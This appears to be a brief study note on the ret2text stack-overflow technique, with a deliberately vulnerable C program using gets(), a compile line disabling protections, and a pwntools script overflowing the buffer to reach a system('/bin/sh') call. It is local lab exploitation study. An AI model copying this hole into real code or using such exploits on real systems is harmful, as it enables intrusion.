ret2text

https://blog.csdn.net/m0_64815693/article/details/129201282?spm=1001.2014.3001.5502

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
 
void secure(void) {
    int secretcode, input;
    srand(time(NULL));
 
    secretcode = rand();
    scanf("%d", &input);
    if (input == secretcode)
        system("/bin/sh");
}
 
int main(void) {
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stdout, 0LL, 1, 0LL);
 
    char s[100];
 
    puts("shu ru ni de zhi?");
    gets(s);
    printf("yes yes yes");
 
    return 0;
}

gcc -z noexecstack -no-pie -z norelro -fno-stack-protector test.c -o test

1. 看保护

2. 插入恶意数据后的栈帧

3. 

4. from pwn import *
   context.log_level = "debug"
   context.terminal = ["bash"]
   p = gdb.debug("/home/pwn/05ret2text/test","break main")
   
   a = input("a:")
   payload = cyclic(0x70 + 0x08) + p64(0x000000000040127b)
   p.sendline(payload)
   p.interactive()